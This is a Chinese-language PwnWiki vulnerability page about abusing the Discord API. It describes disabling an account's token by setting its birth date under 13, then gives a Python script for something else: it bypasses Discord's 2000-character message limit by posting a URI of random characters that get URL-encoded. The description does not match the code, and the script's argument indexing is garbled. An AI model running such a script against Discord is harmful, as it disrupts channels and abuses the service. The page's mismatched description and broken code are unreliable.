Loading
0

Discord API滥用0day

免费、自由、人人可编辑的漏洞库--PwnWiki.com

,

Hand.png 这个页面需要补充,如果您了解该内容,请直接编辑词条。

漏洞原理:

将账户的出生日期设置为小于13岁以禁用Token,因为Discord会自动禁用所有者小于13岁的账户。

请注意,已经设置DoB的账户不受到此漏洞影响。

EXP:

Usage:

python example.py <token>
# Name: 2000 Characters Limit Bypass
# Description: Sends an URI that contains characters that gets URL encoded when sent, which increases the length of the message.
# Author: checksum (@0daySkid)
# Original founder: Siaxos

import requests
import random
import sys

class Exploit:

    def __init__(self, token, channel):
        self.token = token
        self.channel_id = channel
        self.headers = {'Authorization': token}

    @property
    def uri(self):
        chars = ''.join(random.choice('\'"^`|{}') for _ in range(1993))
        return f'<a://a{chars}>'

    def execute(self):
        """ send magical URI """
        return requests.post(f'https://discordapp.com/api/v6/channels/{self.channel_id}/messages', headers=self.headers, json={'content': self.uri})

    
def main():
    if len(sys.argv) < 3:
        print(f'Usage: py {sys.argv0} <token> <channel id>')
        sys.exit()

    token = sys.argv1
    channel_id = sys.argv2

    exploit = Exploit(token, channel_id)

    exploit.execute()


if __name__ == '__main__':
    main()

作者:

原始作者未知。

免费、自由、人人可编辑的漏洞库--PwnWiki.com